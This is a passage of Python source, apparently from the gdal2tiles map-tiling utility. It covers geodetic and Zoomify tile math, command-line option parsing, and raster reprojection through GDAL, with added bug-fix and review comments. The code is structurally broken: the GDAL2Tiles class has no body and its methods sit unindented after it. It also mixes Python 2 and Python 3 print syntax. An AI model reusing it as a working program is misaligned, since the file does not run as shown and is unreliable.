        for level in range(zoom, 0, -1):
            mask = 1 << (level - 1)
            digit = 0
            if tx & mask != 0:
                digit += 1
            if ty & mask != 0:
                digit += 2
            digits.append(str(digit))
        return ''.join(digits)
# ---------------------
class GlobalGeodetic(object):
    """TMS Global Geodetic profile (EPSG:4326, the "unprojected" profile).

    Latitude/longitude are used directly as planar XY coordinates (Plate
    Carree), so only scaling to the pixel pyramid and cutting into tiles
    is required.  Pixel and tile coordinates are in TMS notation (origin
    [0,0] in the bottom-left corner); the pyramid covers the area
    [-180, -90, 180, 90] and such tiles are compatible with Google Earth
    and OpenLayers base maps.
    """

    def __init__(self, tmscompatible, tileSize=256):
        """Set up the pyramid; `tmscompatible` picks the level-0 layout."""
        self.tileSize = tileSize
        if tmscompatible is not None:
            # OSGeo TMS spec layout: two tiles at level 0
            # (0.703125 deg/px for 256 px tiles).
            self.resFact = 180.0 / self.tileSize
        else:
            # OpenLayers / MapProxy WMTS default: one tile at level 0
            # (1.40625 deg/px for 256 px tiles).
            self.resFact = 360.0 / self.tileSize

    def LonLatToPixels(self, lon, lat, zoom):
        """Convert lon/lat to pixel coordinates at `zoom` of the pyramid."""
        res = self.resFact / 2 ** zoom
        return ((180 + lon) / res, (90 + lat) / res)

    def PixelsToTile(self, px, py):
        """Return the (tx, ty) tile covering the given pixel coordinates."""
        size = float(self.tileSize)
        return (int(math.ceil(px / size) - 1), int(math.ceil(py / size) - 1))

    def LonLatToTile(self, lon, lat, zoom):
        """Return the tile at `zoom` which covers the given lon/lat."""
        px, py = self.LonLatToPixels(lon, lat, zoom)
        return self.PixelsToTile(px, py)

    def Resolution(self, zoom):
        """Resolution in arc-degrees/pixel at `zoom` (at the Equator)."""
        return self.resFact / 2 ** zoom

    def ZoomForPixelSize(self, pixelSize):
        """Maximal scale-down zoom of the pyramid closest to `pixelSize`."""
        for zoom in range(MAXZOOMLEVEL):
            if pixelSize > self.Resolution(zoom):
                # Never scale up: step back one level (clamped at 0).
                return max(0, zoom - 1)
        # Falls through (implicit None) when pixelSize is finer than every
        # level, matching the historical behaviour.

    def TileBounds(self, tx, ty, zoom):
        """Return (minLon, minLat, maxLon, maxLat) bounds of the tile."""
        res = self.resFact / 2 ** zoom
        left = tx * self.tileSize * res - 180
        bottom = ty * self.tileSize * res - 90
        right = (tx + 1) * self.tileSize * res - 180
        top = (ty + 1) * self.tileSize * res - 90
        return (left, bottom, right, top)

    def TileLatLonBounds(self, tx, ty, zoom):
        """Return the tile bounds reordered into SWNE form."""
        minx, miny, maxx, maxy = self.TileBounds(tx, ty, zoom)
        return (miny, minx, maxy, maxx)
# ---------------------
# TODO: Finish Zoomify implemtentation!!!
class Zoomify(object):
    """
    Tiles compatible with the Zoomify viewer
    ----------------------------------------
    """

    def __init__(self, width, height, tilesize=256, tileformat='jpg'):
        """Initialization of the Zoomify tile tree.

        width, height -- pixel size of the full-resolution image
        tilesize      -- edge length of a square tile (default 256)
        tileformat    -- extension used by tilefilename() (default 'jpg')
        """
        self.tilesize = tilesize
        self.tileformat = tileformat
        imagesize = (width, height)
        tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize))

        # Size (in tiles) for each tier of pyramid.
        # BUG FIX: the original called the non-existent list.push();
        # Python lists only provide append().
        self.tierSizeInTiles = []
        self.tierSizeInTiles.append(tiles)

        # Image size in pixels for each pyramid tier.
        self.tierImageSize = []
        self.tierImageSize.append(imagesize)

        # Halve the image until it fits a single tile, recording every tier.
        # BUG FIX: the loop condition read the undefined name 'imageSize'
        # (wrong capitalisation) instead of 'imagesize', raising NameError
        # for any image larger than one tile.
        while imagesize[0] > tilesize or imagesize[1] > tilesize:
            imagesize = (math.floor(imagesize[0] / 2),
                         math.floor(imagesize[1] / 2))
            tiles = (math.ceil(imagesize[0] / tilesize),
                     math.ceil(imagesize[1] / tilesize))
            self.tierSizeInTiles.append(tiles)
            self.tierImageSize.append(imagesize)

        # Tiers were collected top-down; Zoomify numbers them bottom-up.
        self.tierSizeInTiles.reverse()
        self.tierImageSize.reverse()

        # Depth of the Zoomify pyramid, number of tiers (zoom levels).
        self.numberOfTiers = len(self.tierSizeInTiles)

        # Cumulative number of tiles up to (excluding) the given tier.
        # BUG FIX: the original assigned self.tileCountUpToTier[0] = 0 on an
        # empty list, which raises IndexError; seed the list with 0 instead.
        self.tileCountUpToTier = [0]
        for i in range(1, self.numberOfTiers + 1):
            self.tileCountUpToTier.append(
                self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1]
                + self.tileCountUpToTier[i - 1])

    def tilefilename(self, x, y, z):
        """Returns filename for tile with given coordinates."""
        # Zoomify groups at most 256 tiles per TileGroup directory, counted
        # across the whole pyramid in tier order.
        tileIndex = x + y * self.tierSizeInTiles[z][0] \
            + self.tileCountUpToTier[z]
        return os.path.join('TileGroup%.0f' % math.floor(tileIndex / 256),
                            '%s-%s-%s.%s' % (z, x, y, self.tileformat))
# =============================================================================
# =============================================================================
# =============================================================================
class GDAL2Tiles(object):
# -------------------------------------------------------------------------
def process(self):
    """Run the full tile-generation pipeline in order.

    Opens and preprocesses the input raster, writes the metadata files and
    HTML viewers, renders the base (deepest) zoom level, and finally builds
    the overview levels higher up in the pyramid.
    """
    self.open_input()
    self.generate_metadata()
    self.generate_base_tiles()
    self.generate_overview_tiles()
# -------------------------------------------------------------------------
def error(self, msg, details=''):
    """Report an error through the option parser and stop the processing.

    When `details` is non-empty it is appended to `msg` on a new line;
    OptionParser.error() prints the message and exits.
    """
    text = msg + '\n' + details if details else msg
    self.parser.error(text)
# -------------------------------------------------------------------------
def progressbar(self, complete=0.0):
    """print progressbar for float value 0..1"""
    # Delegates to GDAL's terminal progress callback, which renders the
    # familiar "0...10...20...done" meter for a completion fraction in [0, 1].
    gdal.TermProgress_nocb(complete)
# -------------------------------------------------------------------------
def stop(self):
    """Stop the rendering immediately"""
    # Cooperative cancellation flag -- presumably polled by the
    # tile-generation loops (not visible in this chunk); setting it does
    # not interrupt any operation already in progress.
    self.stopped = True
# -------------------------------------------------------------------------
def __init__(self, arguments):
    """Constructor function - initialization.

    Parses the command-line `arguments` (list of strings), validates them,
    and derives all processing settings: input/output paths, tile format,
    resampling algorithm, query window size and the user-requested zoom
    range.  Calls self.error() (which exits) on invalid usage.
    """
    self.stopped = False          # set by stop() for cooperative cancel
    self.input = None             # input raster path (set below)
    self.output = None            # output directory (set below)

    # Tile format
    self.tilesize = 256
    self.tiledriver = 'PNG'
    self.tileext = 'png'

    # Should we read bigger window of the input raster and scale it down?
    # Note: Modified later by open_input()
    # Not for 'near' resampling
    # Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
    # Not for 'raster' profile
    self.scaledquery = True

    # How big should be query window be for scaling down
    # Later on reset according the chosen resampling algorithm
    self.querysize = 4 * self.tilesize

    # Should we use Read on the input file for generating overview tiles?
    # Note: Modified later by open_input()
    # Otherwise the overview tiles are generated from existing underlying tiles
    self.overviewquery = False

    # RUN THE ARGUMENT PARSER:
    self.optparse_init()
    (self.options, self.args) = \
        self.parser.parse_args(args=arguments)
    if not self.args:
        self.error('No input file specified')

    # POSTPROCESSING OF PARSED ARGUMENTS:

    # Workaround for old versions of GDAL
    # NOTE(review): `and` binds tighter than `or`, so this reads as
    # (verbose and resampling == 'near') or TermProgress_nocb -- the attribute
    # access is what actually probes the GDAL version.
    try:
        if self.options.verbose and self.options.resampling \
            == 'near' or gdal.TermProgress_nocb:
            pass
    except:
        self.error('This version of GDAL is not supported. Please upgrade to 1.6+.'
                   )

    # ,"You can try run crippled version of gdal2tiles with parameters: -v -r 'near'")

    # Is output directory the last argument?
    # Test output directory, if it doesn't exist
    # NOTE(review): precedence again -- isdir(last) or
    # (len(args) > 1 and not exists(last)).
    if os.path.isdir(self.args[-1]) or len(self.args) > 1 \
        and not os.path.exists(self.args[-1]):
        self.output = self.args[-1]
        self.args = self.args[:-1]

    # More files on the input not directly supported yet
    if len(self.args) > 1:
        self.error('Processing of several input files is not supported.'
                   ,
                   """Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the files:
gdal_vrtmerge.py -o merged.vrt %s"""
                   % ' '.join(self.args))

    # TODO: Call functions from gdal_vrtmerge.py directly

    self.input = self.args[0]

    # Default values for not given options
    if not self.output:
        # Directory with input filename without extension in actual directory
        self.output = \
            os.path.splitext(os.path.basename(self.input))[0]
    if not self.options.title:
        self.options.title = os.path.basename(self.input)
    if self.options.url and not self.options.url.endswith('/'):
        self.options.url += '/'
    if self.options.url:
        self.options.url += os.path.basename(self.output) + '/'

    # Supported options
    self.resampling = None
    if self.options.resampling == 'average':
        # Probe for gdal.RegenerateOverview (missing in very old GDAL).
        try:
            if gdal.RegenerateOverview:
                pass
        except:
            self.error("'average' resampling algorithm is not available."
                       ,
                       "Please use -r 'near' argument or upgrade to newer version of GDAL."
                       )
    elif self.options.resampling == 'antialias':
        # Probe for numpy (only bound when the guarded import succeeded).
        try:
            if numpy:
                pass
        except:
            self.error("'antialias' resampling algorithm is not available."
                       ,
                       'Install PIL (Python Imaging Library) and numpy.'
                       )
    elif self.options.resampling == 'near':
        self.resampling = gdal.GRA_NearestNeighbour
        self.querysize = self.tilesize
    elif self.options.resampling == 'bilinear':
        self.resampling = gdal.GRA_Bilinear
        self.querysize = self.tilesize * 2
    elif self.options.resampling == 'cubic':
        self.resampling = gdal.GRA_Cubic
    elif self.options.resampling == 'cubicspline':
        self.resampling = gdal.GRA_CubicSpline
    elif self.options.resampling == 'lanczos':
        self.resampling = gdal.GRA_Lanczos

    # User specified zoom levels, e.g. '2-5' or '10'.
    self.tminz = None
    self.tmaxz = None
    if self.options.zoom:
        minmax = self.options.zoom.split('-', 1)
        minmax.extend([''])
        (_min, _max) = minmax[:2]
        self.tminz = int(_min)
        if _max:
            self.tmaxz = int(_max)
        else:
            self.tmaxz = int(_min)
    if self.options.profile == 'raster':
        if self.input:
            self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)
        else:
            raise Exception('No input file was specified')
        log2 = lambda x: math.log10(x) / math.log10(2)  # log2 (base 2 logarithm)
        # Deepest zoom whose tiling covers the raster at native resolution.
        self.nativezoom = \
            int(max(math.ceil(log2(self.in_ds.RasterXSize
                / float(self.tilesize))),
                math.ceil(log2(self.in_ds.RasterYSize
                / float(self.tilesize)))))
        # NOTE(review): self.tmaxz may still be None here; None < int only
        # works under Python 2 ordering rules (TypeError on Python 3).
        if self.tmaxz < self.nativezoom:
            self.tmaxz = self.nativezoom
        if self.options.verbose:
            print ('Native zoom of the raster:', self.nativezoom)
        # Get the minimal zoom level (whole raster in one tile)
        if self.tminz == None:
            self.tminz = 0

    # KML generation
    self.kml = self.options.kml

    # Output the results (Python 2 print statements below)
    if self.options.verbose:
        print ('Options:', self.options)
        print ('Input:', self.input)
        print ('Output:', self.output)
        print 'Cache: %s MB' % (gdal.GetCacheMax() / 1024 / 1024)
        print ''
# -------------------------------------------------------------------------
def optparse_init(self):
    """Prepare the option parser for input (argv).

    Builds the OptionParser with all supported gdal2tiles options (tile
    profile, resampling, zoom range, KML and web-viewer settings), applies
    the defaults, and stores the parser in self.parser for __init__().
    """
    from optparse import OptionParser, OptionGroup
    usage = 'Usage: %prog [options] input_file(s) [output]'
    p = OptionParser(usage, version='%prog ' + __version__)
    p.add_option(
        '-p',
        '--profile',
        dest='profile',
        type='choice',
        choices=profile_list,
        help="Tile cutting profile (%s) - default 'mercator' (Google Maps compatible)"
        % ','.join(profile_list),
        )
    p.add_option(
        '-r',
        '--resampling',
        dest='resampling',
        type='choice',
        choices=resampling_list,
        help="Resampling method (%s) - default 'average'"
        % ','.join(resampling_list),
        )
    p.add_option('-s', '--s_srs', dest='s_srs', metavar='SRS',
                 help='The spatial reference system used for the source input data'
                 )
    p.add_option('-z', '--zoom', dest='zoom',
                 help="Zoom levels to render (format:'2-5' or '10')."
                 )
    p.add_option('-e', '--resume', dest='resume',
                 action='store_true',
                 help='Resume mode. Generate only missing files.')
    p.add_option('-a', '--srcnodata', dest='srcnodata',
                 metavar='NODATA',
                 help='NODATA transparency value to assign to the input data'
                 )
    p.add_option('-d', '--tmscompatible', dest='tmscompatible',
                 action='store_true',
                 help='When using the geodetic profile, specifies the base resolution as 0.703125 or 2 tiles at zoom level 0.'
                 )
    p.add_option('-l', '--leaflet', action='store_true',
                 dest='leaflet',
                 help="Set 0,0 point to north. For use with 'leaflet'. Requires -p raster. "
                 )
    p.add_option('--processes', dest='processes', type='int',
                 default=multiprocessing.cpu_count(),
                 help='Number of concurrent processes (defaults to the number of cores in the system)'
                 )
    p.add_option('-v', '--verbose', action='store_true',
                 dest='verbose',
                 help='print status messages to stdout')

    # KML options
    g = OptionGroup(p, 'KML (Google Earth) options',
                    'Options for generated Google Earth SuperOverlay metadata'
                    )
    g.add_option('-k', '--force-kml', dest='kml',
                 action='store_true',
                 help="Generate KML for Google Earth - default for 'geodetic' profile and 'raster' in EPSG:4326. For a dataset with different projection use with caution!"
                 )
    g.add_option('-n', '--no-kml', dest='kml', action='store_false',
                 help='Avoid automatic generation of KML files for EPSG:4326'
                 )
    g.add_option('-u', '--url', dest='url',
                 help='URL address where the generated tiles are going to be published'
                 )
    p.add_option_group(g)

    # HTML options
    g = OptionGroup(p, 'Web viewer options',
                    'Options for generated HTML viewers a la Google Maps'
                    )
    g.add_option(
        '-w',
        '--webviewer',
        dest='webviewer',
        type='choice',
        choices=webviewer_list,
        help="Web viewer to generate (%s) - default 'all'"
        % ','.join(webviewer_list),
        )
    g.add_option('-t', '--title', dest='title',
                 help='Title of the map')
    g.add_option('-c', '--copyright', dest='copyright',
                 help='Copyright for the map')
    g.add_option('-g', '--googlekey', dest='googlekey',
                 help='Google Maps API key from http://code.google.com/apis/maps/signup.html'
                 )
    # BUG FIX: this call was wrapped in a spurious one-element tuple
    # "(g.add_option(...), )", inconsistent with every sibling option.
    g.add_option('-b', '--bingkey', dest='bingkey',
                 help='Bing Maps API key from https://www.bingmapsportal.com/'
                 )
    p.add_option_group(g)

    # TODO: MapFile + TileIndexes per zoom level for efficient MapServer WMS
    # g = OptionGroup(p, "WMS MapServer metadata", "Options for generated mapfile and tileindexes for MapServer")
    # g.add_option("-i", "--tileindex", dest='wms', action="store_true"
    #     help="Generate tileindex and mapfile for MapServer (WMS)")
    # p.add_option_group(g)

    p.set_defaults(
        verbose=False,
        profile='mercator',
        kml=False,
        url='',
        webviewer='all',
        copyright='',
        resampling='average',
        resume=False,
        googlekey='INSERT_YOUR_KEY_HERE',
        bingkey='INSERT_YOUR_KEY_HERE',
        )
    self.parser = p
# -------------------------------------------------------------------------
def open_input(self):
    """Initialization of the input raster, reprojection if necessary.

    Opens self.input with GDAL, determines input/output spatial reference
    systems, builds a warped VRT when reprojection is required (with NODATA
    and alpha-band corrections applied by textual VRT editing), reads the
    georeference and precomputes the per-zoom tile ranges (self.tminmax)
    plus the SWNE-bounds function self.tileswne for the chosen profile.
    """
    gdal.UseExceptions()
    gdal.AllRegister()
    if not self.options.verbose:
        gdal.PushErrorHandler('CPLQuietErrorHandler')

    # Initialize necessary GDAL drivers
    self.out_drv = gdal.GetDriverByName(self.tiledriver)
    self.mem_drv = gdal.GetDriverByName('MEM')
    if not self.out_drv:
        # NOTE(review): the comma passes the driver name as a second
        # Exception argument -- the '%s' placeholder is never formatted.
        raise Exception("The '%s' driver was not found, is it available in this GDAL build?"
                        , self.tiledriver)
    if not self.mem_drv:
        raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?"
                        )

    # Open the input file
    if self.input:
        self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)
    else:
        raise Exception('No input file was specified')

    if self.options.verbose:
        print ('Input file:', '( %sP x %sL - %s bands)'
               % (self.in_ds.RasterXSize, self.in_ds.RasterYSize,
               self.in_ds.RasterCount))

    if not self.in_ds:
        # Note: GDAL prints the ERROR message too
        self.error("It is not possible to open the input file '%s'."
                   % self.input)

    # Read metadata from the input file
    if self.in_ds.RasterCount == 0:
        self.error("Input file '%s' has no raster band"
                   % self.input)

    if self.in_ds.GetRasterBand(1).GetRasterColorTable():
        # TODO: Process directly paletted dataset by generating VRT in memory
        self.error('Please convert this file to RGB/RGBA and run gdal2tiles on the result.'
                   ,
                   """From paletted file you can create RGBA file (temp.vrt) by:
gdal_translate -of vrt -expand rgba %s temp.vrt
then run:
gdal2tiles temp.vrt"""
                   % self.input)

    # Get NODATA value
    # NOTE(review): '!= None' would normally be 'is not None'.
    self.in_nodata = []
    for i in range(1, self.in_ds.RasterCount + 1):
        if self.in_ds.GetRasterBand(i).GetNoDataValue() != None:
            self.in_nodata.append(self.in_ds.GetRasterBand(i).GetNoDataValue())
    if self.options.srcnodata:
        # -a/--srcnodata overrides the values stored in the file; pad a short
        # list by cycling it across all bands.
        nds = list(map(float, self.options.srcnodata.split(',')))
        if len(nds) < self.in_ds.RasterCount:
            self.in_nodata = (nds
                              * self.in_ds.RasterCount)[:self.in_ds.RasterCount]
        else:
            self.in_nodata = nds
    if self.options.verbose:
        print 'NODATA: %s' % self.in_nodata

    #
    # Here we should have RGBA input dataset opened in self.in_ds
    #

    if self.options.verbose:
        print ('Preprocessed file:', '( %sP x %sL - %s bands)'
               % (self.in_ds.RasterXSize, self.in_ds.RasterYSize,
               self.in_ds.RasterCount))

    # Spatial Reference System of the input raster
    self.in_srs = None
    if self.options.s_srs:
        self.in_srs = osr.SpatialReference()
        self.in_srs.SetFromUserInput(self.options.s_srs)
        self.in_srs_wkt = self.in_srs.ExportToWkt()
    else:
        self.in_srs_wkt = self.in_ds.GetProjection()
        if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:
            self.in_srs_wkt = self.in_ds.GetGCPProjection()
        if self.in_srs_wkt:
            self.in_srs = osr.SpatialReference()
            self.in_srs.ImportFromWkt(self.in_srs_wkt)

    # elif self.options.profile != 'raster':
    #     self.error("There is no spatial reference system info included in the input file.","You should run gdal2tiles with --s_srs EPSG:XXXX or similar.")

    # Spatial Reference System of tiles
    self.out_srs = osr.SpatialReference()
    if self.options.profile == 'mercator':
        self.out_srs.ImportFromEPSG(900913)
    elif self.options.profile == 'geodetic':
        self.out_srs.ImportFromEPSG(4326)
    else:
        self.out_srs = self.in_srs

    # Are the reference systems the same? Reproject if necessary.
    self.out_ds = None
    if self.options.profile in ('mercator', 'geodetic'):
        # An identity geotransform with no GCPs means no georeference at all.
        if self.in_ds.GetGeoTransform() == (
            0.0,
            1.0,
            0.0,
            0.0,
            0.0,
            1.0,
            ) and self.in_ds.GetGCPCount() == 0:
            self.error("There is no georeference - neither affine transformation (worldfile) nor GCPs. You can generate only 'raster' profile tiles."
                       ,
                       "Either gdal2tiles with parameter -p 'raster' or use another GIS software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
                       )
        if self.in_srs:
            if self.in_srs.ExportToProj4() \
                != self.out_srs.ExportToProj4() \
                or self.in_ds.GetGCPCount() != 0:
                # Generation of VRT dataset in tile projection, default 'nearest neighbour' warping
                self.out_ds = gdal.AutoCreateWarpedVRT(self.in_ds,
                        self.in_srs_wkt, self.out_srs.ExportToWkt())

                # TODO: HIGH PRIORITY: Correction of AutoCreateWarpedVRT according the max zoomlevel for correct direct warping!!!

                if self.options.verbose:
                    print "Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')"
                    self.out_ds.GetDriver().CreateCopy('tiles.vrt',
                            self.out_ds)

                # Note: self.in_srs and self.in_srs_wkt contain still the non-warped reference system!!!

                # Correction of AutoCreateWarpedVRT for NODATA values:
                # rewrite the VRT XML as text to inject the warp options.
                if self.in_nodata != []:
                    (fd, tempfilename) = \
                        tempfile.mkstemp('-gdal2tiles.vrt')
                    self.out_ds.GetDriver().CreateCopy(tempfilename,
                            self.out_ds)
                    # open as a text file
                    s = open(tempfilename).read()
                    # Add the warping options
                    s = s.replace("""<GDALWarpOptions>""",
                                  """<GDALWarpOptions>
<Option name="INIT_DEST">NO_DATA</Option>
<Option name="UNIFIED_SRC_NODATA">YES</Option>""")
                    # replace BandMapping tag for NODATA bands....
                    for i in range(len(self.in_nodata)):
                        s = \
                            s.replace("""<BandMapping src="%i" dst="%i"/>"""
                                % (i + 1, i + 1),
                                """<BandMapping src="%i" dst="%i">
<SrcNoDataReal>%i</SrcNoDataReal>
<SrcNoDataImag>0</SrcNoDataImag>
<DstNoDataReal>%i</DstNoDataReal>
<DstNoDataImag>0</DstNoDataImag>
</BandMapping>"""
                                % (i + 1, i + 1, self.in_nodata[i],
                                self.in_nodata[i]))  # Or rewrite to white by: , 255 ))
                    # save the corrected VRT
                    open(tempfilename, 'w').write(s)
                    # open by GDAL as self.out_ds
                    self.out_ds = gdal.Open(tempfilename)  # , gdal.GA_ReadOnly)
                    # delete the temporary file
                    os.unlink(tempfilename)
                    # set NODATA_VALUE metadata
                    # NOTE(review): assumes at least three NODATA values.
                    self.out_ds.SetMetadataItem('NODATA_VALUES',
                            '%i %i %i' % (self.in_nodata[0],
                            self.in_nodata[1], self.in_nodata[2]))
                    if self.options.verbose:
                        print "Modified warping result saved into 'tiles1.vrt'"
                        open('tiles1.vrt', 'w').write(s)

                # -----------------------------------
                # Correction of AutoCreateWarpedVRT for Mono (1 band) and RGB (3 bands) files without NODATA:
                # equivalent of gdalwarp -dstalpha
                if self.in_nodata == [] and self.out_ds.RasterCount \
                    in [1, 3]:
                    (fd, tempfilename) = \
                        tempfile.mkstemp('-gdal2tiles.vrt')
                    self.out_ds.GetDriver().CreateCopy(tempfilename,
                            self.out_ds)
                    # open as a text file
                    s = open(tempfilename).read()
                    # Add the warping options
                    s = s.replace("""<BlockXSize>""",
                                  """<VRTRasterBand dataType="Byte" band="%i" subClass="VRTWarpedRasterBand">
<ColorInterp>Alpha</ColorInterp>
</VRTRasterBand>
<BlockXSize>"""
                                  % (self.out_ds.RasterCount + 1))
                    s = s.replace("""</GDALWarpOptions>""",
                                  """<DstAlphaBand>%i</DstAlphaBand>
</GDALWarpOptions>"""
                                  % (self.out_ds.RasterCount + 1))
                    s = s.replace("""</WorkingDataType>""",
                                  """</WorkingDataType>
<Option name="INIT_DEST">0</Option>"""
                                  )
                    # save the corrected VRT
                    open(tempfilename, 'w').write(s)
                    # open by GDAL as self.out_ds
                    self.out_ds = gdal.Open(tempfilename)  # , gdal.GA_ReadOnly)
                    # delete the temporary file
                    os.unlink(tempfilename)
                    if self.options.verbose:
                        print "Modified -dstalpha warping result saved into 'tiles1.vrt'"
                        open('tiles1.vrt', 'w').write(s)
                    # NOTE(review): leftover assignment; `s` is not used
                    # again after this point.
                    s = '''
'''
        else:
            # NOTE(review): 'ESPG' is a typo for 'EPSG' in this message.
            self.error('Input file has unknown SRS.',
                       'Use --s_srs ESPG:xyz (or similar) to provide source reference system.'
                       )

        if self.out_ds and self.options.verbose:
            print ('Projected file:', 'tiles.vrt',
                   '( %sP x %sL - %s bands)'
                   % (self.out_ds.RasterXSize,
                   self.out_ds.RasterYSize,
                   self.out_ds.RasterCount))

    if not self.out_ds:
        self.out_ds = self.in_ds

    #
    # Here we should have a raster (out_ds) in the correct Spatial Reference system
    #

    # Get alpha band (either directly or from NODATA value)
    self.alphaband = self.out_ds.GetRasterBand(1).GetMaskBand()
    if self.alphaband.GetMaskFlags() & gdal.GMF_ALPHA \
        or self.out_ds.RasterCount == 4 or self.out_ds.RasterCount \
        == 2:
        # TODO: Better test for alpha band in the dataset
        self.dataBandsCount = self.out_ds.RasterCount - 1
    else:
        self.dataBandsCount = self.out_ds.RasterCount

    # KML test: auto-enable KML when tiles end up in EPSG:4326.
    self.isepsg4326 = False
    srs4326 = osr.SpatialReference()
    srs4326.ImportFromEPSG(4326)
    if self.out_srs and srs4326.ExportToProj4() \
        == self.out_srs.ExportToProj4():
        self.kml = True
        self.isepsg4326 = True
        if self.options.verbose:
            print 'KML autotest OK!'

    # Read the georeference
    self.out_gt = self.out_ds.GetGeoTransform()

    # originX, originY = self.out_gt[0], self.out_gt[3]
    # pixelSize = self.out_gt[1] # = self.out_gt[5]

    # Test the size of the pixel
    # MAPTILER - COMMENTED
    # if self.out_gt[1] != (-1 * self.out_gt[5]) and self.options.profile != 'raster':
    # TODO: Process corectly coordinates with are have swichted Y axis (display in OpenLayers too)
    # self.error("Size of the pixel in the output differ for X and Y axes.")

    # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
    if (self.out_gt[2], self.out_gt[4]) != (0, 0):
        self.error('Georeference of the raster contains rotation or skew. Such raster is not supported. Please use gdalwarp first.'
                   )
        # TODO: Do the warping in this case automaticaly

    #
    # Here we expect: pixel is square, no rotation on the raster
    #

    # Output Bounds - coordinates in the output SRS
    # NOTE(review): ominy uses out_gt[1] (x pixel size), relying on the
    # square-pixel assumption above rather than abs(out_gt[5]).
    self.ominx = self.out_gt[0]
    self.omaxx = self.out_gt[0] + self.out_ds.RasterXSize \
        * self.out_gt[1]
    self.omaxy = self.out_gt[3]
    self.ominy = self.out_gt[3] - self.out_ds.RasterYSize \
        * self.out_gt[1]

    # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15

    if self.options.verbose:
        print ('Bounds (output srs):', round(self.ominx, 13),
               self.ominy, self.omaxx, self.omaxy)

    #
    # Calculating ranges for tiles in different zoom levels
    #

    if self.options.profile == 'mercator':
        self.mercator = GlobalMercator()  # from globalmaptiles.py

        # Function which generates SWNE in LatLong for given tile
        self.tileswne = self.mercator.TileLatLonBounds

        # Generate table with min max tile coordinates for all zoomlevels
        self.tminmax = list(range(0, 32))
        for tz in range(0, 32):
            (tminx, tminy) = self.mercator.MetersToTile(self.ominx,
                    self.ominy, tz)
            (tmaxx, tmaxy) = self.mercator.MetersToTile(self.omaxx,
                    self.omaxy, tz)
            # crop tiles extending world limits (+-180,+-90)
            (tminx, tminy) = (max(0, tminx), max(0, tminy))
            (tmaxx, tmaxy) = (min(2 ** tz - 1, tmaxx), min(2 ** tz
                              - 1, tmaxy))
            self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)

        # TODO: Maps crossing 180E (Alaska?)

        # Get the minimal zoom level (map covers area equivalent to one tile)
        if self.tminz == None:
            self.tminz = \
                self.mercator.ZoomForPixelSize(self.out_gt[1]
                    * max(self.out_ds.RasterXSize,
                    self.out_ds.RasterYSize) / float(self.tilesize))

        # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)
        if self.tmaxz == None:
            self.tmaxz = \
                self.mercator.ZoomForPixelSize(self.out_gt[1])

        if self.options.verbose:
            print ('Bounds (latlong):',
                   self.mercator.MetersToLatLon(self.ominx,
                   self.ominy),
                   self.mercator.MetersToLatLon(self.omaxx,
                   self.omaxy))
            print ('MinZoomLevel:', self.tminz)
            print ('MaxZoomLevel:', self.tmaxz, '(',
                   self.mercator.Resolution(self.tmaxz), ')')

    if self.options.profile == 'geodetic':
        self.geodetic = GlobalGeodetic(self.options.tmscompatible)  # from globalmaptiles.py

        # Function which generates SWNE in LatLong for given tile
        self.tileswne = self.geodetic.TileLatLonBounds

        # Generate table with min max tile coordinates for all zoomlevels
        self.tminmax = list(range(0, 32))
        for tz in range(0, 32):
            (tminx, tminy) = self.geodetic.LonLatToTile(self.ominx,
                    self.ominy, tz)
            (tmaxx, tmaxy) = self.geodetic.LonLatToTile(self.omaxx,
                    self.omaxy, tz)
            # crop tiles extending world limits (+-180,+-90)
            (tminx, tminy) = (max(0, tminx), max(0, tminy))
            (tmaxx, tmaxy) = (min(2 ** (tz + 1) - 1, tmaxx), min(2
                              ** tz - 1, tmaxy))
            self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)

        # TODO: Maps crossing 180E (Alaska?)

        # Get the minimal zoom level (map covers area equivalent to one tile)
        if self.tminz == None:
            self.tminz = \
                self.geodetic.ZoomForPixelSize(self.out_gt[1]
                    * max(self.out_ds.RasterXSize,
                    self.out_ds.RasterYSize) / float(self.tilesize))

        # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)
        if self.tmaxz == None:
            self.tmaxz = \
                self.geodetic.ZoomForPixelSize(self.out_gt[1])

        if self.options.verbose:
            print ('Bounds (latlong):', self.ominx, self.ominy,
                   self.omaxx, self.omaxy)

    if self.options.profile == 'raster':
        log2 = lambda x: math.log10(x) / math.log10(2)  # log2 (base 2 logarithm)
        # Deepest zoom whose tiling covers the raster at native resolution.
        self.nativezoom = \
            int(max(math.ceil(log2(self.out_ds.RasterXSize
                / float(self.tilesize))),
                math.ceil(log2(self.out_ds.RasterYSize
                / float(self.tilesize)))))
        # NOTE(review): self.tmaxz may be None here; None < int relies on
        # Python 2 ordering (TypeError on Python 3).
        if self.tmaxz < self.nativezoom:
            self.tmaxz = self.nativezoom

        if self.options.verbose:
            print ('Native zoom of the raster:', self.nativezoom)

        # Get the minimal zoom level (whole raster in one tile)
        if self.tminz == None:
            self.tminz = 0

        # Get the maximal zoom level (native resolution of the raster)
        if self.tmaxz == None:
            self.tmaxz = self.nativezoom

        # Generate table with min max tile coordinates for all zoomlevels
        self.tminmax = list(range(0, self.tmaxz + 1))
        self.tsize = list(range(0, self.tmaxz + 1))
        for tz in range(0, self.tmaxz + 1):
            tsize = 2.0 ** (self.nativezoom - tz) * self.tilesize
            (tminx, tminy) = (0, 0)
            tmaxx = int(math.ceil(self.out_ds.RasterXSize / tsize)) \
                - 1
            tmaxy = int(math.ceil(self.out_ds.RasterYSize / tsize)) \
                - 1
            self.tsize[tz] = math.ceil(tsize)
            self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)

        # Function which generates SWNE in LatLong for given tile
        if self.kml and self.in_srs_wkt:
            self.ct = osr.CoordinateTransformation(self.in_srs,
                    srs4326)

            def rastertileswne(x, y, z):
                # Tile bounds in the output SRS, then (optionally)
